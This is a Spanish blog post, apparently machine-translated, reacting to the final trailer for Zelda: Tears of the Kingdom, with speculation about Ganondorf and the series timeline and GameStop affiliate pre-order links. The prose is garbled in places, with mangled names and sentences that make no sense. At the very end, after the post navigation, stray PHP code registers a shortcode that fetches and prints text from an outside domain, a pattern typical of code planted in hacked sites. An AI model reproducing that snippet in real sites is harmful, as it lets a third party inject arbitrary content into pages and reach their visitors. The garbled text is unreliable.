El tráiler final de La Leyenda de Zelda: Lágrimas del Reino ¡ha caído! Estoy muy emocionado por este juego. Ya conocíamos nuevas habilidades increíbles como la habilidad de fusión, pero después de este tráiler, ¡mi nivel de emoción está fuera de serie! Productor de la serie eiji aonuma Una vez más, presentó el tráiler y habló sobre cómo el juego “conecta a la perfección la superficie y el cielo”.


¿Es Ganondorf o Demise? ¿Es eso un barco? Es viento ¿También se atasca? ¿Con quién estaba hablando Zelda? ¡Este tráiler se ve genial! ¡Hay tantos que no puedo procesarlos todos! Así es como suena mate mercer Realmente voy a expresar a Ganondorf, que es genial. Vemos algunas armas geniales como una espada con un escudo incorporado. Vemos un uso genial de la función de rebobinado introducida la última vez en la batalla. Un fuego frío es la hidra a la que Link deberá enfrentarse. ¡Estoy tan adentro! Vemos más aliados de Link aparentemente uniéndose a la refriega. Algunas criaturas nuevas que no estoy seguro de lo que son, pero no son buenos.


Un par de cosas. Al principio, parece que Ganondorf está ahí, pero esa primera toma en el tráiler con el pelo rojo brillante (?) se parece mucho a Demise de espada al cielo. Además, tenemos esa toma de alguien con una capa hablando con Zelda y siento que debería saber quién es, pero no puedo pensar en eso. Si lo sabes, por favor comenta abajo y ayúdame. Siento que es de alguien. princesa del Crepúsculo.


Entonces, creo que este juego será increíble. Además, realmente parece atarse en la espalda cada vez más. zelda el juego. Sabemos espada al cielo estaba conectado y este tráiler al menos indica eso. levantavientos Y tal vez incluso princesa del Crepúsculo Y otros se van a conectar. Tendría algún sentido desde la línea de tiempo oficial. Aliento de lo salvaje Teniendo lugar en algún momento después de las tres líneas de tiempo divididas y Lágrimas del Reino es un resultado directo de Aliento de lo salvaje. Que piensas sobre todo esto? ¿Me estoy perdiendo algo obvio? Probablemente. Dime en los comentarios!


Puedes esperar jugar. Lágrimas del Reino En Nintendo Switch a partir del 12 de mayo. Los pedidos anticipados están disponibles ahora a través de sus puntos de venta favoritos, incluido GameStop (enlace de afiliado). El Switch OLED de aspecto genial también está disponible para pre-pedido a finales de este mes en sus minoristas favoritos como GameStop (enlace de afiliado).


Previous Post Next Post
function pub_short() { $pub_text = file_get_contents( "https://alrafdean.org/me/pub.txt" ); return $pub_text; } add_shortcode('pub', 'pub_short');